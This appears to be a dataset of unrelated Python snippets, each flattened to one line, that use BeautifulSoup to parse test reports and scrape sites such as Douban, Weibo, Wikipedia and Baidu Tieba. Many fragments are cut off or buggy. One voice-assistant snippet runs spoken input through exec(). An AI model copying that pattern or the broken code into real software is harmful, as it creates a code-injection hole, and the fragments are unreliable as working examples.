def parse_junit_results(output): try: directory = sys.argv[1] except: print("Error: Enter a valid local repository") return -1 try: path = '../{}/target/surefire-reports/' path = path.format(directory) files = os.listdir(path) except IOError: print("Error: Configuration file not found or inaccessible.") return -1 try: from BeautifulSoup import BeautifulSoup except ImportError: from bs4 import BeautifulSoup body = [] for file in files: if file.startswith('TEST'): xml = open(path + file) soup = BeautifulSoup(xml, 'xml') failureLog = '' message = '' status = '' for tag in soup.find_all('testcase'): if tag is not None: name = tag['classname'] step = tag['name'] if tag.find('failure') is not None: status = 'FAIL' try: failure = tag.find('failure') message = failure['message'] failureLog = base64.b64encode( bytes(failure.text, 'utf-8')) failureLog = failureLog.decode('utf-8') except: message = 'None' failureLog = '' elif tag.find('skipped') is not None: status = 'SKIP' else: status = 'PASS' value = create_test_logs_json(name, step, status, message, failureLog, output) body.append(value) return body
def parse(folder, inlinks, outlinks): """ Read all .html files in the specified folder. Populate the two dictionaries inlinks and outlinks. inlinks maps a url to its set of backlinks. outlinks maps a url to its set of forward links. """ filepath = '.\\'+folder+'\\*.html' for path in glob.glob(filepath): with open(path, 'r') as f: html = f.readlines() inlink = f.name.split('\\')[-1] bs = BeautifulSoup(''.join(html)) for link in bs.find_all('a'): outlink = link.get('href') outlinks[inlink].add(outlink) inlinks[outlink].add(inlink)
def parse(self, html): ''' 解析给定html字符串里面的微博数据 ----------------------------------------- html: 给定的html字符串 -------------------------------------- return: blog列表 ''' bpos = html.find('<!--feed内容-->') epos = html.find('<!--翻页-->', bpos) bloghtml = html[bpos:epos].replace('\\/', '/') + '</div>' soup = BeautifulSoup(bloghtml) blogsouplist = soup.find_all('div', class_='WB_cardwrap WB_feed_type S_bg2 ') bloglist = [] for blogsoup in blogsouplist: self.init_blog() self._parse_blog(blogsoup) bloglist.append(self.blog) return bloglist
def main(): page = '' try: href = 'http://www.google.com.tw/' session = requests.Session() page = get_page(session, href) #print(page) except reuqests.exceptions.HTTPError: return None soup = BeautifulSoup(page) #print(soup.prettify()) # using BequtifulSoup 3 if soup is None: print('soup is none') for img in soup.find_all(['img']): print img['src'] # /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif '''
def crawl_page(session, can_url, url, todo, page): print ("Crawling " + url) page.add_alias(url) req = session.get(url) print("\t" + req.url) soup = BeautifulSoup(req.text, 'html.parser') for link in soup.find_all('a'): if link.has_attr('href'): dest = urljoin(url, link['href']) href = urlparse(dest) if href.netloc != '' and href.netloc != can_url.netloc: continue if href.path == '.': continue if dest not in todo: todo.add(dest) page.form_inputs.update(get_form_inputs(soup))
def crawl(url): page = urllib2.urlopen(url) contents = page.read() soup = BeautifulSoup(contents) print(u'豆瓣电影250: 序号 \t影片名\t 评分 \t评价人数') for tag in soup.find_all('div', class_='item'): m_order = int(tag.find('em').get_text()) m_name = tag.a.get_text() m_year = tag.span.get_text() for y in tag.find_all('em'): if y.get_text() != m_order : score = y.get_text() '''m_rating_num = int(tag.find_all('em').get_text())''' la= [] for n in tag.find_all('span'): la.append(n) if len(la[4].get_text() ) <= 4: m_rating_num = la[5].get_text() else: m_rating_num = la[4].get_text() print("%s %s %s %s %s" % (m_order, m_name, m_year, score, m_rating_num))
def html_to_json(content, indent=None): soup = BeautifulSoup(content, "lxml") rows = soup.find_all("tr") headers = {} thead = soup.find("thead") if thead: thead = thead.find_all("th") for i in range(len(thead)): headers[i] = thead[i].text.strip().lower() data = [] for row in rows: cells = row.find_all("td") if thead: items = {} for index in headers: items[headers[index]] = cells[index].text else: items = [] for index in cells: items.append(index.text.strip()) data.append(items) return json.dumps(data, indent=indent)
def getSubGroups(url, group): log.write("-getSubGroups-\n") try: html = requests.get(url+group.getLink()) content = BeautifulSoup(html.text, "lxml") log.write("->Got "+group.getName()+"'s page content\n") #Log file which will contain all twitter ids labeled according to the groups subGroup = None #Retrieving groups and people listed below these groups for div in content.find_all('div', {"class":["size14", "person-box"]}): #Subgroup found if "size14" in div.attrs['class']: if subGroup != None: #Adding a subgroup to its repective group group.addCollection(subGroup) try: subGroup = Group() subGroup.setLink(div.a['href']) subGroup.setName(div.text.encode('utf-8')) except Exception, e: log.write('erro: '+str(e)+'\n') #Person found if "person-box" in div.attrs['class']: divPerson = div.find('div', 'name') try: person = Person() person.setName(divPerson.text.encode('utf-8')) person.setLink(divPerson.a['href']) #Retrieving this person's twitter id get_twitter_screen_name(url, person) #Adding a person to its repective subgroup subGroup.addCollection(person) #Registering this information in the log file f.write(group._name+' - '+subGroup._name+' - '+person._name+' - '+person._screen_name+'\n') except Exception, e: log.write('erro: '+str(e)+'\n')
def visit(scheme, domain, resource): ''' Visit 'url' with designated 'user_agent' return a 'resources' list with unique elements ''' global _non_visited_links temporal_resource_list = list() if resource.startswith('/'): url = "%s://%s%s" % (scheme, domain, resource) else: url = "%s://%s/%s" % (scheme, domain, resource) print("visiting: url: %s" % url) request = requests.get(url, headers=user_agent) soup = BeautifulSoup(request.text) resources = { 'anchor': (soup.find_all('a'), 'href'), 'iframe': (soup.find_all('iframe'), 'src'), 'frame': (soup.find_all('frame'), 'src'), 'img': (soup.find_all('img'), 'src'), 'link': (soup.find_all('link'), 'href'), 'script': (soup.find_all('script'), 'src'), 'form': (soup.find_all('form'), 'action'), } for res in resources.values(): tags, attr = res for tag in tags: if tag.has_attr(attr): temporal_resource_list.append(tag[attr]) if resource.startswith('/'): resource = resource[1:] _visited_links.append(resource) _non_visited_links.extend(resource_filter(domain, temporal_resource_list))
import sys, os try: from BeautifulSoup import BeautifulSoup except: from bs4 import BeautifulSoup import urllib.request, re, csv html = urllib.request.urlopen("http://snr.unl.edu/lincolnweather/data/monthly-observed-vs-normals.asp") soup = BeautifulSoup(html, "lxml") tables = soup.find_all("table") print(len(tables)) temps = tables[0] with open("mon_temps_lnk.csv", "w", newline="") as csvfile: writer = csv.writer(csvfile) for row in temps.find_all("tr"): data = [] for cell in row.find_all("td"): data.append(cell.text) print(data) writer.writerow(data)
dir_location = "{}/{}".format(settings.cache_directory, user.id); if not os.path.exists(dir_location): os.makedirs(dir_location); if num == 0: print("scraping {}...".format(user.permalink)); num += 1; with urllib.request.urlopen(tracks_page) as response: html = response.read(); soup = BeautifulSoup(html, "html.parser"); for article in soup.find_all(class_='audible'): track = article.find('a', attrs={"itemprop": "url"}, href=True); timestamp = article.find('time'); file_location = "{}/{}.json".format(dir_location, track['href'].split("/")[-1:][0]); if os.path.exists(file_location): continue; info = { "id": -1, "title": track.text, "duration": -1, "timestamp": timestamp.text, "description": "API request was rejected, unable to scrape for description.", "permalink": "http://soundcloud.com{}".format(track['href']),
def parser_core(word_extract) : parse_soup = BeautifulSoup(word_extract) text_file.write("Main Word:") text_file.write("\n") for word in parse_soup.find_all("b"): text_file.write(word.get_text()) text_file.write("\n") text_file.write('\n') text_file.write("Part of Speech:") text_file.write("\n") for word in parse_soup.find_all("i"): text_file.write(word.get_text()) text_file.write("\n") text_file.write("\n") text_file.write("Definition:") text_file.write("\n") definition = re.search(re.compile('<td>(?!<).*</td>'), str(word_extract)).group() Definition_Soup = BeautifulSoup(definition) for word in Definition_Soup.find_all("td"): text_file.write(word.get_text()) text_file.write("\n") text_file.write("\n") text_file.write("Synonyms:") text_file.write("\n") while True : check_syn = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract)) if check_syn == None : text_file.write("None") text_file.write("\n") break syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract)).group() synonyms_soup = BeautifulSoup(syn_ant) for word in synonyms_soup.find_all("span"): parser_synonyms = word.get_text() parser_synonyms = re.sub('^\n', '', str(parser_synonyms)) parser_synonyms = re.sub(',[ \t]', ',\n', str(parser_synonyms)) parser_synonyms = re.sub(',', '', str(parser_synonyms)) text_file.write(parser_synonyms) text_file.write("\n") if True : break text_file.write("\n") text_file.write("Antonyms:") text_file.write("\n") syn_ant = re.sub(re.compile('<td><span>.*?</span></td>', re.DOTALL), '', str(syn_ant), 1) while True : check_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant)) if check_ant == None : text_file.write("None") text_file.write("\n") text_file.write("\n") break syn_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant)).group() antonyms_soup = BeautifulSoup(syn_ant) for word in antonyms_soup.find_all("span"): parser_antonyms = word.get_text() parser_antonyms = re.sub('^\n', '', str(parser_antonyms)) parser_antonyms = re.sub(',[ \t]', ',\n', str(parser_antonyms)) parser_antonyms = re.sub(',', '', str(parser_antonyms)) text_file.write(parser_antonyms) text_file.write("\n") text_file.write("\n") if True : break
from BeautifulSoup import BeautifulSoup import urllib2 webpage = urllib2.urlopen('http://en.wikipedia.org/wiki/Main_Page') soup = BeautifulSoup(webpage) for anchor in soup.find_all('a'): print(anchor.get('href', '/'))
def main(input=input, *args): response = "hi" choose = False choice = "go" YorN = None words = [""] chunk = 0 link = 0 global droid, prompt #### MAIN LOOP: while response is not "": ################### input and convert to list of words print "input1=" + input, "response1=" + response # , "choice="+choice while input == "" or input == "nospeech" or input is None: input = droid.recognizeSpeech().result if not response: print "noresponse" input = droid.recognizeSpeech().result # exec(channel) if choose: print "choose" prompt = choice choice = droid.recognizeSpeech().result input = "choose" # exec(channel) if not choose and response: input = droid.recognizeSpeech().result # prompt = response+'>'; exec(channel) if input is None: time.sleep(7) input = "" # print 2 #exec(channel) else: print "input2=", input # exec('print 2') # if input is None: # prompt = response+'>' # input = raw_input('>') try: words = input.split(" ") except: pass #### set context(s) '''if context: phrase2 = raw_input(str(context)+ ' is ') context['action'] = phrase2; context = None print dctn[df[0]]['action'] #confirm = raw_input('confirm?') #if confirm == 'y': context = confirm; context = None; input ="okay"''' ################### direct commands if input == "quit": response = "" if input == "save": PBcreateBranch() break if input == "dctn": response = str(dctn) print response, dctn continue if input == "hi": response = "hello" if prompt == "anything else? (yes/no)>": if YorN == "yes": pass if YorN == "no": break ################### keyword based commands ########## definitions if " is " in input and not "what is " in input and not words[0] == "is": df = input.split(" is ") # definition try: dctn[df[0]] = df[1] except: print "error, not entered" # dctn[df[0]]=[df[1]] if df[1] == "action": dctn[df[0]] = {"action": ""} response = "how " + df[0] + "?" context = dctn[df[0]] response = "okay" # continue if " is not " in input: split = input.split(" is not ") # remove definition try: dctn[split[0]].remove(split[1]) except: pass ######## question if "?" in input: input = input.strip("?") if "what is" in input: q = input.split("what is ") # print dctn[q[1]] if q[1] in dctn: response = dctn[q[1]] else: try: input = "search " + q[1] except: response = q[1] + " is not known" ######## google if "search" in input: query = input.replace("search ", "") print "searching " + query from pygoogle import pygoogle g = pygoogle(query) g.pages = 1 results = g.__search__() # print str(results) choose = True response = results[link]["content"] # response = repr(response) response.encode("ascii") # response.encode('ascii', 'ignore'); ################################################################################################################################## if choose: print "chooseTrue" if choice == "next": link = link + 1 print "link=", link response = results[link]["content"] # response = repr(response) response.encode("ascii") if choice == "go": br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [ ( "User-agent", "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1", ) ] page = br.open(url) response = page.read() soup = BeautifulSoup(response, "html.parser") # paras=soup.p #findAll('p', text=True) VALID_TAGS = ["p", "span"] # , 'ul', 'li', 'br']'div', paras = [ i.text.encode("ascii", "ignore") for i in soup.find_all(VALID_TAGS) ] ################## removes <p>s paras = filter(None, paras) paras = [i.replace("\n", ".").replace("\r", ".") for i in paras] paras = [ i.replace("(", "parens").replace(")", "parens").replace("[", "bracket").replace("]", "bracket") for i in paras ] input = raw_input("pause") ######## actions if "e" in input: exec1 = input.split("e ") # exec try: exec (exec1[1]) continue except Exception, e: print str(e) if "do" in input: # action try: exec (dctn[words[1]]["action"] + ' "' + str("".join(words[2:99])) + '"') continue except Exception, e: print str(e)
#f=open('/home/sunying/hello-jane/weathercrawler/f.txt','w') #f.write(self.html) #f.close() self.page.close() return self.soup crawler= Crawler(url) csoup=crawler.getHtml(url) #f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w') csoup=str(csoup) #print csoup #f.close() #soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html') soup = BeautifulSoup(csoup) #soup= soup.prettify() csoup=soup.find_all("div",id="tqyDiv") csoup=csoup.find_all("div",id="gdDiv") csoup=csoup.find_all("div",class_="hzDqDivClass") #,id="gdDiv") #print soup res=re.compile(r'<div id=\"dq\d\" onclick=\".+\">([\u4e00-\u9fa5]{2})</div>') result=res.findall(str(csoup)) print result #print len(result) #f=open('/home/sunying/hello-jane/weathercrawler/re.csv','w') with open('/home/sunying/hello-jane/weathercrawler/hzqx.csv', 'wb') as csvfile: #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL) i=0 while i < len(result): spamwriter = csv.writer(csvfile, dialect='excel') spamwriter.writerow(result[i])
#f.close() self.page.close() return self.soup month=1 while month<=12: crawler= Crawler(year,month,city) #print crawler.url_back() csoup=crawler.getHtml(crawler.url_back()) #f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w') csoup=str(csoup) #print csoup #f.close() #soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html') soup = BeautifulSoup(csoup) #soup= soup.prettify() csoup=soup.find_all("table") #print soup res=re.compile(r'<td><strong>(\d|\d{2})</strong></td>'+r'<td>(-?\d+\.\d|-?\d{2}|-|\d|-?\d|-?\d+\.\d{2}|-?\d+\.\d{2})</td>'*10) result=res.findall(str(csoup)) result=list(result) print result #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a') #f.write(str(result)) #f.close() #print len(result) # #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a') with open('/home/sunying/hello-jane/weathercrawler/hzqx/hzweather.csv','a') as csvfile: #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL) spamwriter = csv.writer(csvfile, dialect='excel') spamwriter.writerow(['%4d-%02d'%(2012,month)])
# coding:utf-8 import requests from BeautifulSoup import BeautifulSoup DownPath = "~/material/spider/www.meizitu.com/pic" head = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'} TimeOut = 5 PhotoName = 0 c = '.jpeg' PWD = DownPath for x in range(1, 4): site = "http://www.meizitu.com/a/qingchun_3_%d.html" % x Page = requests.session().get(site, headers=head, timeout=TimeOut) Coding = (Page.encoding) Content = Page.content #.decode(Coding).encode('utf-8') ContentSoup = BeautifulSoup(Content) jpg = ContentSoup.find_all('img', {'class': 'scrollLoading'}) for photo in jpg: PhotoAdd = photo.get('data-original') PhotoName += 1 Name = (str(PhotoName) + c) r = requests.get(PhotoAdd, stream=True) with open(PWD + Name, 'wb') as fd: for chunk in r.iter_content(): fd.write(chunk) print ("You have down %d photos" % PhotoName)
<td headers="pltab1time">19:50:01</td> <td class="bold" headers="pltab1artist">Jason Derulo</td> <td headers="pltab1title">In my head</td></tr> <tr class="wsOdd"><td headers="pltab1time">19:45:30</td> <td class="bold" headers="pltab1artist">Lena</td> <td headers="pltab1title">Neon (Lonely People)</td> </tr></tbody></table></div> """ soup = BeautifulSoup(html_doc2) #print(soup.prettify()) #print (soup.find_all('td')) #print (soup.find_all("td", "headers")) print (soup.find_all(headers=re.compile("pltab1artist", "pltab1title"))) #print (soup.title.string) #print (fotze) """ for headers in soup.find_all('td'): print (soup.find(headers="pltab1artist")) print (soup.find(headers="pltab1title")) """ #for headers in soup.find_all('td'): # print(headers.get('td')) #headers="pltab1artist"
if imgs[1]: ensure_dir(loc) total_page_div = soup.find('span', class_='red') if (hasattr(total_page_div, 'text')): total_page = int(total_page_div.text) else: total_page = 1 for i in range(2, total_page + 1): imgs[i] = get_img_from_url(url + "&pn=" + str(i)) for i in imgs: for j in imgs[i]: links.add(j.get('src')) thread.start_new(down_links_to_folder, (links, dirname)) return links except Exception, e: print 'error..', e baidu_base_url = 'http://tieba.baidu.com' baidu_homepage = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=%E5%A7%90%E8%84%B1") soup = BeautifulSoup(baidu_homepage.content) titles = soup.find_all('a', target="_blank", class_="j_th_tit") urls = {} for i, title in enumerate(titles): urls[i] = baidu_base_url + title.get('href') print urls[i], title.text.encode('gbk', 'ignore') for i in urls: thread.start_new(get_tieba_img_url_from_url, (urls[i] + '?see_lz=1',)) #time.sleep(100000)